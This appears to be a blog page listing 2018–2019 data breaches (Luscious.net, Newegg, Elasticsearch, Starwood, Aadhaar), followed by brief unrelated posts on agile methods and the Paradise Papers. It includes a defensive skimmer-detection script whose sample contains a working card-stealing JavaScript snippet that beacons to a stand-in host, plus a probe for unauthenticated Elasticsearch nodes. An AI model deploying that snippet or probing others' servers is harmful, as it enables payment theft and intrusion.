Luscious.net – exposed data

Luscious.net exposed the details of roughly 1.2 million users. According to the team at vpnMentor, an unsecured database allowed anyone to read Luscious account holders' personal details.

The accessible data included usernames, email addresses, activity logs, and location data for all 1.195 million users.

“Our team was able to access this database because it was completely unsecured and unencrypted,” writes the vpnMentor team. 

If Luscious users happened to use email addresses associated with their real names to register accounts, that information — tied to location data — could be more than enough to associate specific Luscious accounts with their owners. Users’ video uploads to the site were also accessible.

The breach was discovered on Aug. 15, and, after being notified by vpnMentor, Luscious fixed the issue on Aug. 19. That doesn’t mean, however, that no harm was done. 

“While the data breach is now closed,” write the researchers, “it’s still possible that other hackers could have accessed it earlier and extracted the same data we viewed.” 

“A greater issue of concern is the fact that many users joined Luscious on official government emails,” notes vpnMentor. “We found examples of this from users in Brazil, Australia, Italy, Malaysia, and Australia.”

The 2015 Ashley Madison hack demonstrated how this type of information is practically designed for blackmail. In that case, a dating site purportedly offering to put married men in touch with women was breached, and its database consisting of usernames and emails fell into the hands of hackers.

Data breaches 2019 are expensive

Organisations have had it easy for some time. Data breaches are increasingly being met with regulatory penalties, including fines under GDPR. Some noted fines are:

  • British Airways: the UK ICO announced its intention to fine the airline £183M (roughly $230M).
  • Facebook: $5B from the US FTC over the Cambridge Analytica data harvesting.
  • Marriott: the UK ICO announced its intention to fine the hotel group £99M.

In Australia, the OAIC reports that it received 812 privacy complaints in 2018.

Entity                                   | Records          | Organisation type         | Method
-----------------------------------------|------------------|---------------------------|---------------------------
2019 Bulgarian revenue agency hack       | over 5,000,000   | government                | hacked
Canva                                    | 140,000,000      | web                       | hacked
Capital One                              | 106,000,000      | financial                 | hacked
Desjardins                               | 2,900,000        | financial                 | inside job
Facebook                                 | 540,000,000      | social network            | poor security
Facebook                                 | 1,500,000        | social network            | accidentally uploaded
First American Corporation               | 885,000,000      | financial service company | poor security
Health Sciences Authority (Singapore)    | 808,000          | healthcare                | poor security
Justdial                                 | 100,000,000      | local search              | unprotected API
Ministry of Health (Singapore)           | 14,200           | healthcare                | poor security/inside job
Quest Diagnostics                        | 11,900,000       | clinical laboratory       | poor security
StockX                                   | 6,800,000        | retail                    | hacked
Truecaller                               | 299,055,819      | telephone directory       | unknown
Woodruff Arts Center                     | unknown          | arts group                | poor security
Westpac                                  | 98,000           | financial                 | hacked
Australian National University           | 19 years of data | academic                  | hacked

Here are a few links to fines noted.

Biggest Data Security breaches 2018

#10 — Panera

Number of victims: 37 million
Who was targeted: All PaneraBread.com customer accounts
What data was exposed: Names, email and physical addresses, birthdays, and the last four digits of the customers’ credit card numbers
Timeframe: Disclosed April 2018
What happened: Despite being warned by a security researcher in August 2017 that its website was leaking customer data, the Panera IT team failed to act until eight months later, when it acknowledged the leak and took the site down for security maintenance.

#9 — Newegg

Number of victims: 50 million
Who was targeted: Newegg online shoppers
What data was exposed: Credit card info
Timeframe: August 14, 2018 – September 18, 2018
What happened: The online retailer was compromised by the Magecart group, who injected a credit card skimming script into the Newegg checkout page. Whenever a customer completed a purchase, the script copied the payment details from the form and sent them to a server under Magecart's control (a command and control, or C&C, server).
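The Newegg entry describes the mechanism but not how you would spot it. The script below is an added example (not Newegg's or Magecart's code) that scans a checkout page's HTML for the three things a Magecart-style injection leaves behind: a script loaded from a host outside the site's allowlist, an external script with no Subresource Integrity attribute, and an inline script that both reads form fields and ships data somewhere. The allowlist, the regexes and the sample page (including the `collector.test` destination) are constructed for illustration.

```python
"""Heuristic scan of a checkout page for Magecart-style skimmer scripts.

Added example for this page. ALLOWED_SCRIPT_HOSTS and SAMPLE_CHECKOUT_HTML
are constructed assumptions, not a real site's configuration.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed first-party hosts that are allowed to serve script on the checkout page.
ALLOWED_SCRIPT_HOSTS = {"www.example-shop.test", "cdn.example-shop.test"}

# A skimmer reads payment fields ...
READS_FORM = re.compile(r"\.value\b|FormData\(|querySelectorAll\(\s*['\"]input", re.I)
# ... and sends them off-site (XHR, fetch, beacon, or an image beacon via .src =).
EXFILTRATES = re.compile(r"XMLHttpRequest|fetch\(|navigator\.sendBeacon|new\s+Image\(|\.src\s*=", re.I)
FOREIGN_URL = re.compile(r"https?://([a-z0-9.-]+)", re.I)


class ScriptCollector(HTMLParser):
    """Collects every <script> tag: its src, integrity attribute and inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            a = dict(attrs)
            self._current = {"src": a.get("src"), "integrity": a.get("integrity"), "body": ""}

    def handle_data(self, data):
        if self._current is not None:
            self._current["body"] += data

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None


def scan_checkout_html(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return a list of (finding, detail) tuples in document order."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for s in parser.scripts:
        if s["src"]:
            host = urlparse(s["src"]).hostname  # None for relative (first-party) paths
            if host and host not in allowed_hosts:
                findings.append(("third-party-script", s["src"]))
            elif host and not s["integrity"]:
                findings.append(("missing-sri", s["src"]))
        else:
            body = s["body"]
            if READS_FORM.search(body) and EXFILTRATES.search(body):
                foreign = {h for h in FOREIGN_URL.findall(body) if h not in allowed_hosts}
                findings.append(("inline-skimmer", ", ".join(sorted(foreign)) or "(destination not literal)"))
    return findings


# Constructed sample: one clean script, one without SRI, one third-party loader,
# and an inline hook that reads the card number and beacons it to collector.test.
SAMPLE_CHECKOUT_HTML = """<html><body>
<form id="checkout"><input name="cc"><input name="cvv"></form>
<script src="https://cdn.example-shop.test/checkout.js" integrity="sha384-abc"></script>
<script src="https://cdn.example-shop.test/analytics.js"></script>
<script src="https://collector.test/stats.js"></script>
<script>
document.getElementById('checkout').addEventListener('submit', function () {
  var cc = document.querySelector('input[name=cc]').value;
  var img = new Image();
  img.src = 'https://collector.test/c?d=' + btoa(cc);
});
</script>
</body></html>"""

if __name__ == "__main__":
    for finding, detail in scan_checkout_html(SAMPLE_CHECKOUT_HTML):
        print(f"{finding}: {detail}")
```

The heuristics are deliberately noisy (a legitimate analytics snippet can trip them), so treat hits as review items. The durable fix is server-side: a Content-Security-Policy whose `script-src` names only the allowlisted hosts, `integrity` attributes on every external script, and `connect-src`/`img-src` restricted so an injected script has nowhere to send what it reads.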

#8 — Elasticsearch

Number of victims: 82 million (57M consumers, 26M businesses)
Who was targeted: Users and online businesses across the internet
What data was exposed: From individual users — names, email and physical addresses, phone numbers, IP addresses, employers, and job titles. From businesses — names, company details, zip codes, carrier routes, latitudes/longitudes, census tracts, phone numbers, web addresses, email addresses, employee count, revenue numbers, NAICS codes, SIC codes, and more.
Timeframe: Discovered November 14, 2018
What happened: This is the now-familiar case of a routine scan for exposed servers leading a researcher to an open database holding over 80 million records of aggregated personal and business data. It is unknown how long the databases were sitting unguarded and who, if anyone, had the opportunity to copy the data. Researchers believe they traced the unguarded databases to a data management company that has since closed its doors, but the owner has not been officially confirmed.
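The Luscious case above ("completely unsecured and unencrypted") and this Elasticsearch entry are the same failure mode: a database listening on the internet with no authentication. The probe below is an added example (not vpnMentor's tooling) that asks an Elasticsearch node for its index listing without credentials and reports whether that succeeded. It assumes Elasticsearch's standard REST API (`GET /_cat/indices`); the transport is injectable, and the hosts and responses in the sample run are constructed so it runs offline.

```python
"""Check whether an Elasticsearch endpoint serves its index listing unauthenticated.

Added example for this page. The hostnames open-es.test / locked-es.test and
the responses in CONSTRUCTED_RESPONSES are made up for the offline demo.
"""
import json
import urllib.error
import urllib.request

# _cat/indices with format=json returns a list of objects; counts come back as strings.
CAT_PATH = "/_cat/indices?format=json&h=index,docs.count,store.size"


def http_get(url, timeout=5):
    """Default transport: (status, body). Sends no credentials on purpose."""
    req = urllib.request.Request(url, headers={"Accept": "application/json"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def assess_elasticsearch(base_url, fetch=http_get):
    """Return a dict describing exposure; 'exposed' is True only if the index
    listing was readable without authentication."""
    status, body = fetch(base_url.rstrip("/") + CAT_PATH)
    if status in (401, 403):
        return {"exposed": False, "reason": f"auth enforced (HTTP {status})"}
    if status != 200:
        return {"exposed": False, "reason": f"not an open Elasticsearch endpoint (HTTP {status})"}
    try:
        indices = json.loads(body)
    except ValueError:
        return {"exposed": False, "reason": "HTTP 200 but body is not JSON"}
    if not isinstance(indices, list):
        return {"exposed": False, "reason": "HTTP 200 but not a _cat listing"}
    total_docs = sum(int(i.get("docs.count") or 0) for i in indices)
    return {
        "exposed": True,
        "indices": [i["index"] for i in indices],
        "total_docs": total_docs,
        "reason": "index listing readable without credentials",
    }


# Constructed responses: one wide-open node, one with security enabled.
CONSTRUCTED_RESPONSES = {
    "http://open-es.test:9200" + CAT_PATH: (200, json.dumps([
        {"index": "users", "docs.count": "1195000", "store.size": "310mb"},
        {"index": "activity_logs", "docs.count": "52000000", "store.size": "9gb"},
    ])),
    "http://locked-es.test:9200" + CAT_PATH: (401, json.dumps({
        "error": {"type": "security_exception",
                  "reason": "missing authentication credentials for REST request"}
    })),
}


def fake_fetch(url, timeout=5):
    """Offline stand-in for http_get."""
    return CONSTRUCTED_RESPONSES[url]


if __name__ == "__main__":
    for host in ("http://open-es.test:9200", "http://locked-es.test:9200"):
        print(host, assess_elasticsearch(host, fetch=fake_fetch))
```

Run it against your own nodes with the default transport (`assess_elasticsearch("http://10.0.0.5:9200")`) from outside the trusted network; a `True` here means anyone who finds the port can pull every index, exactly as in the two cases above. The fix is not a firewall rule alone: bind the node to an internal interface, enable Elasticsearch's built-in authentication, and put TLS in front of it.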

#7 —  Facebook

Number of victims: 87 million
Who was targeted: Facebook users
What data was exposed: Profile info, political beliefs, friend networks, private messages
Timeframe: Disclosed March 2018
What happened: This is the notorious Cambridge Analytica scandal, in which the data-analytics firm harvested users' information without their permission. The operation was politically motivated, aimed at influencing the 2016 US presidential campaign. And though the harvesting happened a couple of years earlier, it was only in 2018 that investigative findings came out, giving a clearer picture of what happened.

#6 — MyHeritage

Number of victims: 92 million
Who was targeted: MyHeritage users
What data was exposed: email addresses and hashed passwords
Timeframe: Alerted June 2018
What happened: Cybersecurity researchers alerted the genealogy site in June 2018 that an outside server had been discovered with sensitive MyHeritage info. The company confirmed the info was legitimate and alerted its users that any account holders who signed up earlier than October 26, 2017 were at risk and should change their passwords.

#5 — Quora

Number of victims: 100 million
Who was targeted: Quora users
What data was exposed: Names, email addresses, hashed passwords, profile data, public and non-public actions
Timeframe: Discovered December 3, 2018
What happened: Many questions still surround the details of this breach, but the question-and-answer site reported to its users that a third party had gained unauthorized access to one of their systems, expounding no further.  

#4 — Under Armour

Number of victims: 150 million
Who was targeted: MyFitnessPal users
What data was exposed: User names, email addresses, hashed passwords
Timeframe: Late February 2018
What happened: The company’s food and nutrition app was hacked, opening up the above info to the attackers, but not, thankfully, any payment info, which the company processes through a separate channel.

#3 — Exactis

Number of victims: 340 million (230M consumers, 110M businesses)
Who was targeted: Users and businesses across the internet
What data was exposed: Over 400 categories of detail, such as phone numbers, email and physical addresses, interests, ages, religions, pet ownership, etc.
Timeframe: June 2018
What happened: Data collection firm Exactis left a server holding close to 2 terabytes of data publicly accessible on the internet. It is unknown who, or how many people, accessed the information before it was discovered.

#2 — Starwood

Number of victims: 500 million
Who was targeted: Starwood guests
What data was exposed: Names, email and physical addresses, phone numbers, passport numbers, account info, birth dates, gender, travel info, and accommodation info. For some guests the exposed data also included encrypted payment card numbers.
Timeframe: Discovered September 10, 2018, but the intrusion may have stretched as far back as 2014
What happened: Like many other official breach statements, the Marriott-owned hotel chain said only that its reservation database had suffered "unauthorized access"; later reporting on the investigation attributed the intrusion to Chinese state-sponsored actors working for intelligence purposes.

#1 — Aadhaar

Number of victims: 1.1 billion
Who was targeted: Indian citizens
What data was exposed: Aadhaar numbers, names, email and physical addresses, phone numbers, and photos
Timeframe: August 2017 – January 2018
What happened: Anonymous sellers on WhatsApp charged Rs 500 or less for access to a portal into India's Unique Identification Authority, where the records of virtually every citizen were at the buyer's fingertips.

Agile Thinking

Agile has been around for some 15 years now. Organisations have tried to leverage agile thinking; some have failed. Yet agile thinking remains relevant to the enterprise. It has evolved beyond a technical audience, now encompasses the broader business community, and draws on a smorgasbord of techniques. These include:

  • Kanban
  • Extreme Programming (XP)
  • Holacracy
  • Scrum
  • Rapid Application Development (RAD)
  • Shu-Ha-Ri / Retrospectives
  • Lean Startup
  • Beyond Budgeting
  • Motivation 3.0
  • Stoos Network
  • Radical Management
  • Management 3.0
  • Cynefin Framework
  • WikiSpeed
  • Social Contracts
  • Agile Chartering
  • Agile Testing
  • NoEstimates
  • Showcases

Agile gives teams a way to manage people, processes, resources and project time. It is important for teams to develop soft skills such as:

  • Communication
  • Discipline
  • Social Respect
  • Responsibility

Agile tooling has also evolved. Today's tools provide:

  • Agile Metrics
  • Impact Mapping, Story Mapping
  • Feature, Epics, Stories
  • Planning Poker
  • Release Planning

 

We have the Paradise Papers

Obviously, the elites haven't learnt from the Panama Papers. Setting up these offshore structures takes a long time, and dismantling them takes significant effort too. So what are the Paradise Papers?

They are 13.4 million records obtained from the law firm and corporate services provider Appleby. They involve both individuals and organisations.

Interestingly, Singapore has largely kept itself out of this leak.

Anyway, here’s a copy of the paradise papers dataset.